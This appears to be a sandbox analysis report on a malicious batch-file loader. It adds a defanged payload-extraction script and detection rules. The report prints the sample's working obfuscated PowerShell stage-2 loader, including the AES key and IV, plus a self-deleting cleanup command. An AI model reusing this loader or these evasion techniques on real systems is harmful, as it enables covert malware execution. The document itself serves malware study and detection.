Analysis
max time kernel: 90s
max time network: 115s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-01-2023 10:37
Static task: static1
Behavioral task: behavioral1
Sample: xxicqf.bat
Resource: win10v2004-20220901-en
General
Target: xxicqf.bat
Size: 325KB
MD5: 4f3c7ff71a35d8abaf90dd0f2353b621
SHA1: b42e3e4ea9ff13c978d1b614f06f2d86735e495d
SHA256: 76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a
SHA512: a81106eea5988266fe759d22393b3b5f745c4e27db367ba930913c29c5afe03cac374112c1ec312c2f267d8477eab1e8f2bdf709c28b0a3ef0f90f762cdc982f
SSDEEP: 6144:sb0ERTjCC/oq28xqqHBykjjIxEfTKyRfFysWiS3IzZK/DPcAW:sbXjCC/oX8x3HBykjMxsmyRf1UaKTcAW
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  pid  process
  628  xxicqf.bat.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  description        ioc                                                                                                process
  Key value queried  \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation  xxicqf.bat.exe

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  17    api.ipify.org
  18    api.ipify.org

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The "likely ransomware behaviour" wording is the sandbox's generic description of this signature; no IoC is recorded for it in this report, so on its own it is weak evidence of anything.

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Caveat: every IoC below is attributed to wermgr.exe (Windows Error Reporting), which PID 628 spawned, not to the sample's own process. WER reads these keys for its own report data, so this signature carries little evasion signal for this sample.
  description        ioc                                                                                    process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 wermgr.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  wermgr.exe
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                      wermgr.exe

Enumerates system info in registry (2 TTPs, 2 IoCs)
Same caveat as above: both reads are performed by wermgr.exe, not by the sample.
  description        ioc                                                         process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS            wermgr.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  wermgr.exe

Runs ping.exe (1 TTP, 1 IoC)
PING.EXE -n 10 localhost (PID 3704), spawned by cmd.exe PID 4340; see the process tree below. No IoC row is recorded for this signature beyond the process itself.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid  process
  628  xxicqf.bat.exe
  628  xxicqf.bat.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid  process
  Token: SeDebugPrivilege  628  xxicqf.bat.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid  process
  628  xxicqf.bat.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Each parent/child edge below is recorded twice in the report (hence 16 IoCs for 8 distinct edges); together they reconstruct the process tree.
  pid   process         target pid  target process
  4324  cmd.exe         628         xxicqf.bat.exe
  628   xxicqf.bat.exe  4340        cmd.exe
  628   xxicqf.bat.exe  212         cmd.exe
  628   xxicqf.bat.exe  484         wermgr.exe
  4340  cmd.exe         4588        chcp.com
  212   cmd.exe         4468        choice.exe
  4340  cmd.exe         3704        PING.EXE
  212   cmd.exe         2344        attrib.exe

Views/modifies file attributes (1 TTP, 1 IoC)
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" (attrib.exe, PID 2344); see the process tree below.
Processes

Process tree (PIDs taken from the WriteProcessMemory IoCs above):

- C:\Windows\system32\cmd.exe (PID 4324)
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat"
  - Suspicious use of WriteProcessMemory

  - C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe (PID 628)
    "xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat').Split([Environment]::NewLine);foreach ($SdoSn in $TaxYb) { if ($SdoSn.StartsWith(':: ')) { $NuzKW = $SdoSn.Substring(3); break; }; };$OHzNm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NuzKW);$BecaB = New-Object System.Security.Cryptography.AesManaged;$BecaB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BecaB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BecaB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=');$BecaB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3CRmi+qFKdZMzOHEfmfcA==');$EBkLd = $BecaB.CreateDecryptor();$OHzNm = $EBkLd.TransformFinalBlock($OHzNm, 0, $OHzNm.Length);$EBkLd.Dispose();$BecaB.Dispose();$bbcNa = New-Object System.IO.MemoryStream(, $OHzNm);$HkQNi = New-Object System.IO.MemoryStream;$phbxT = New-Object System.IO.Compression.GZipStream($bbcNa, [IO.Compression.CompressionMode]::Decompress);$phbxT.CopyTo($HkQNi);$phbxT.Dispose();$bbcNa.Dispose();$HkQNi.Dispose();$OHzNm = $HkQNi.ToArray();$ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm);$YEeli = $ZnJXZ.EntryPoint;$YEeli.Invoke($null, (, [string[]] ('')))
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    The batch file runs the dropped 442KB binary xxicqf.bat.exe (hashes under Downloads) with PowerShell switches: no profile, hidden window, execution policy bypassed. The one-liner is a complete stage-2 loader. It reads xxicqf.bat itself, takes the first line beginning with ':: ' (a batch comment, so cmd.exe skips it when running the file), Base64-decodes it, decrypts it with AES in CBC mode and PKCS7 padding using a hard-coded 32-byte key (AES-256) and 16-byte IV, GZip-decompresses the plaintext, loads the result as a .NET assembly straight from memory and invokes its entry point with an empty argument array. Every .NET member name is stored reversed and rebuilt at run time by negative-index slicing so that the plain strings never appear in the script: 'txeTllAdaeR' is ReadAllText, 'gnirtS46esaBmorF' is FromBase64String, 'daoL' is Load. The decrypted payload never touches disk, but the key and IV needed to recover it from the .bat are both present in this command line.

    - C:\Windows\system32\cmd.exe (PID 4340)
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat" "
      - Suspicious use of WriteProcessMemory
      24hThCDJcd5N.bat is the 211-byte batch file listed under Downloads. The report shows it running the two commands below; anything else it contains is not shown here.

      - C:\Windows\system32\chcp.com (PID 4588)
        chcp 65001
        Switches the console code page to UTF-8.

      - C:\Windows\system32\PING.EXE (PID 3704)
        ping -n 10 localhost
        - Runs ping.exe
        Ten echo requests to localhost, roughly a nine-second pause: the usual batch-file substitute for a sleep command.

    - C:\Windows\System32\cmd.exe (PID 212)
      "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
      - Suspicious use of WriteProcessMemory
      Self-deletion of the dropped host binary. choice waits one second and auto-answers "y" (another sleep substitute), attrib -h -s clears the hidden and system attributes, and del then removes the file; del skips hidden and system files unless /A is given, so the attrib step is what makes the delete succeed.

      - C:\Windows\system32\choice.exe (PID 4468)
        choice /c y /n /d y /t 1

      - C:\Windows\system32\attrib.exe (PID 2344)
        attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
        - Views/modifies file attributes

    - C:\Windows\system32\wermgr.exe (PID 484)
      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "628" "3628" "3532" "2904" "0" "0" "2144" "0" "0" "0" "0" "0"
      - Checks processor information in registry
      - Enumerates system info in registry
      Windows Error Reporting's out-of-process manager, started by PID 628 (whose PID is its third argument). The CPU and BIOS registry reads flagged under Signatures belong to WER, not to the payload, and should not be read as sandbox evasion.
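The decoding chain from PID 628's command line, rebuilt as an extraction tool. This is an added example, not code from the sample or from the sandbox report: it calls the same .NET classes the loader uses, but stops before Assembly.Load() and writes the decrypted payload to disk for static analysis instead. The function and parameter names (Expand-ReversedName, Export-BatPayload, -BatPath, -OutPath, -KeyB64, -IvB64) are chosen here; the default key and IV are the values embedded in the command line above. Run it in an isolated analysis VM against a copy of xxicqf.bat, never on the affected host.

```powershell
# Added example, not the sample's code and not part of the sandbox report:
# a defanged re-implementation of the loader's decoding chain. Same steps as
# the analysed command line (read the .bat, take the first ':: ' line,
# Base64-decode, AES-CBC/PKCS7-decrypt, GZip-decompress), but the payload is
# written out and hashed instead of being loaded and invoked.
# Function/parameter names are ours; key and IV defaults come from the sample.

function Expand-ReversedName {
    # Undo the "'txeTllAdaeR'[-1..-11] -join ''" trick: the loader stores each
    # .NET member name reversed and re-reverses it at run time by negative-index
    # slicing, so ReadAllText, FromBase64String and Load never appear literally.
    param([Parameter(Mandatory)][string]$Reversed)
    $chars = $Reversed.ToCharArray()
    [array]::Reverse($chars)
    return (-join $chars)
}

function Export-BatPayload {
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [Parameter(Mandatory)][string]$OutPath,
        [string]$KeyB64 = '0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=',   # 32 bytes -> AES-256
        [string]$IvB64  = 'R3CRmi+qFKdZMzOHEfmfcA=='                        # 16 bytes
    )

    # 1. The ciphertext travels as a batch comment: the first line beginning
    #    with ':: '. cmd.exe ignores it; the loader reads it back.
    $blob = $null
    foreach ($line in [System.IO.File]::ReadAllLines($BatPath)) {
        if ($line.StartsWith(':: ')) { $blob = $line.Substring(3); break }
    }
    if (-not $blob) { throw "no ':: ' payload line found in $BatPath" }
    $cipherText = [System.Convert]::FromBase64String($blob)

    # 2. AES-CBC with PKCS7 padding; key and IV are hard-coded in the loader.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [System.Convert]::FromBase64String($KeyB64)
    $aes.IV      = [System.Convert]::FromBase64String($IvB64)
    $decryptor = $aes.CreateDecryptor()
    try {
        $compressed = $decryptor.TransformFinalBlock($cipherText, 0, $cipherText.Length)
    } finally {
        $decryptor.Dispose(); $aes.Dispose()
    }

    # 3. GZip-decompress the plaintext into the raw .NET assembly bytes.
    $inStream  = New-Object System.IO.MemoryStream(, $compressed)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $gzip.CopyTo($outStream)
    $gzip.Dispose(); $inStream.Dispose()
    $payload = $outStream.ToArray()
    $outStream.Dispose()

    # 4. Where the loader calls Assembly.Load() and EntryPoint.Invoke(), write
    #    the bytes to disk instead. A .NET assembly is a PE image, so the first
    #    two bytes should read 'MZ' (0x4D 0x5A) if the key and IV were right.
    [System.IO.File]::WriteAllBytes($OutPath, $payload)
    [pscustomobject]@{
        OutPath     = $OutPath
        Size        = $payload.Length
        SHA256      = (Get-FileHash -Algorithm SHA256 -LiteralPath $OutPath).Hash
        LooksLikePE = ($payload.Length -ge 2 -and $payload[0] -eq 0x4D -and $payload[1] -eq 0x5A)
    }
}

# Usage, from an isolated analysis VM holding a copy of the sample:
#   Expand-ReversedName 'gnirtS46esaBmorF'
#   Export-BatPayload -BatPath .\xxicqf.bat -OutPath .\xxicqf_payload.bin
```

Expand-ReversedName applied to 'txeTllAdaeR', 'gnirtS46esaBmorF' and 'daoL' yields the three member names the loader hides. If the .bat has been altered or its ':: ' line re-encoded, TransformFinalBlock throws a CryptographicException on the padding check; that is the sign the key or IV no longer match, not a decompression problem.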
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat
  Filesize: 211B
  MD5: 39f88ba1ed3e90cab71806a54bd40c7a
  SHA1: 75726c444f4630a5a3a046955e41d2bee4f3751f
  SHA256: db29147a00ef147848ea12573b88d772cdfdcee0758c1a14f87d105da7b983aa
  SHA512: 31141a2827f1a9572f6dc9e64be1b11587b5fad732c778018e37a15526a9911ae8f20e7f0b494d62cd200fcbed8784ea1e4249e371b5c094dab88b084334efca
- C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/212-142   0x0000000000000000 (mapping.dmp)
memory/484-143   0x0000000000000000 (mapping.dmp)
memory/628-132   0x0000000000000000 (mapping.dmp)
memory/628-138   0x000002D8AE780000-0x000002D8AE832000 (memory.dmp), Filesize 712KB
memory/628-139   0x000002D8AEDA0000-0x000002D8AEF62000 (memory.dmp), Filesize 1MB
memory/628-140   0x00007FFC48150000-0x00007FFC48C11000 (memory.dmp), Filesize 10MB
memory/628-137   0x000002D8AE670000-0x000002D8AE6C0000 (memory.dmp), Filesize 320KB
memory/628-134   0x000002D8AE1B0000-0x000002D8AE1D2000 (memory.dmp), Filesize 136KB
memory/628-135   0x00007FFC48150000-0x00007FFC48C11000 (memory.dmp), Filesize 10MB
memory/628-148   0x00007FFC48150000-0x00007FFC48C11000 (memory.dmp), Filesize 10MB
memory/2344-149  0x0000000000000000 (mapping.dmp)
memory/3704-147  0x0000000000000000 (mapping.dmp)
memory/4340-141  0x0000000000000000 (mapping.dmp)
memory/4468-146  0x0000000000000000 (mapping.dmp)
memory/4588-145  0x0000000000000000 (mapping.dmp)
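The behaviours recorded in the Signatures and Processes sections, turned into hunting rules and run over constructed telemetry. This is an added example, not part of the sandbox report. The event shape (Type, ProcessId, ParentImage, Image, CommandLine, QueryName) is an assumption modelled loosely on Sysmon process-creation and DNS-query events; the sample events are constructed from this report's process tree, with the loader command line shortened to the parts the rules inspect. Rule 1 generalises slightly beyond this sample (.cmd.exe as well as .bat.exe, and any abbreviation of -ExecutionPolicy and -WindowStyle).

```powershell
# Added example, not part of the sandbox report: hunting rules derived from the
# behaviours above, run over constructed events. Property names are an
# assumption (Sysmon-like); rename them to match your own log source.

function Find-BatLoaderActivity {
    param([Parameter(Mandatory)][object[]]$Events)
    $hits = New-Object 'System.Collections.Generic.List[object]'

    foreach ($e in $Events) {
        $cl     = [string]$e.CommandLine
        $image  = [System.IO.Path]::GetFileName([string]$e.Image)
        $parent = [System.IO.Path]::GetFileName([string]$e.ParentImage)
        $rules  = @()

        if ($e.Type -eq 'DnsQuery' -and $e.QueryName -eq 'api.ipify.org') {
            # External-IP discovery through a public lookup service. Add the other
            # services you see in your environment to this comparison.
            $rules += 'external-ip-lookup'
        }
        if ($e.Type -eq 'ProcessCreate') {
            # Rule 1: cmd.exe starting a double-extension binary with the PowerShell
            # switches used here (-ep bypass, -windowstyle hidden). Generalised to
            # .cmd.exe and to abbreviated -ExecutionPolicy / -WindowStyle spellings.
            if ($parent -eq 'cmd.exe' -and $image -match '\.(bat|cmd)\.exe$' -and
                $cl -match '-(ep|ex\w*)\s+bypass' -and $cl -match '-w\w*\s+hidden') {
                $rules += 'double-extension-powershell-host'
            }
            # Rule 2: member names stored reversed and rebuilt by negative-index
            # slicing ('txeTllAdaeR'[-1..-11] -join ''), together with a reflective
            # [System.Reflection.Assembly] call, i.e. an in-memory assembly load.
            if ($cl -match "'[A-Za-z0-9]+'\[-1\.\.-\d+\]\s*-join" -and
                $cl -match '\[System\.Reflection\.Assembly\]::') {
                $rules += 'reversed-names-reflective-load'
            }
            # Rule 3: the self-delete chain. choice /t N is the delay, attrib -h -s
            # strips the attributes that make del skip a file, and del names the
            # same path that attrib just cleared.
            if ($image -eq 'cmd.exe' -and
                $cl -match 'choice\s+/c\s+\w\s+/n\s+/d\s+\w\s+/t\s+\d+' -and
                $cl -match 'attrib\s+-h\s+-s\s+"([^"]+)"') {
                $target = $Matches[1]
                if ($cl -match ('del\s+"' + [regex]::Escape($target) + '"')) {
                    $rules += "self-delete-chain ($target)"
                }
            }
        }
        foreach ($r in $rules) {
            $hits.Add([pscustomobject]@{ Rule = $r; ProcessId = $e.ProcessId; Image = $image })
        }
    }
    return $hits
}

# Constructed sample telemetry mirroring the process tree in this report. The
# loader command line is cut down to the fragments the rules look at.
$loaderCmd = @'
"xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat'); $ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm); $ZnJXZ.EntryPoint.Invoke($null, (, [string[]] ('')))
'@
$sampleEvents = @(
    [pscustomobject]@{ Type='ProcessCreate'; ProcessId=628;  ParentImage='C:\Windows\system32\cmd.exe'; Image='C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe'; CommandLine=$loaderCmd; QueryName=$null }
    [pscustomobject]@{ Type='ProcessCreate'; ProcessId=212;  ParentImage='C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe'; Image='C:\Windows\System32\cmd.exe'; CommandLine='"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"'; QueryName=$null }
    [pscustomobject]@{ Type='ProcessCreate'; ProcessId=3704; ParentImage='C:\Windows\system32\cmd.exe'; Image='C:\Windows\system32\PING.EXE'; CommandLine='ping -n 10 localhost'; QueryName=$null }
    [pscustomobject]@{ Type='DnsQuery';      ProcessId=628;  ParentImage=$null; Image='C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe'; CommandLine=$null; QueryName='api.ipify.org' }
)

Find-BatLoaderActivity -Events $sampleEvents | Format-Table -AutoSize
```

On the constructed events the loader process (PID 628) fires both the double-extension and the reversed-names rules, cmd.exe PID 212 fires the self-delete rule with the deleted path in its label, and the DNS event fires external-ip-lookup. The ping -n 10 localhost event is deliberately left unflagged: it is a delay idiom far too common in benign scripts to alert on by itself, and it only becomes interesting in the context of the parent chain shown in the process tree.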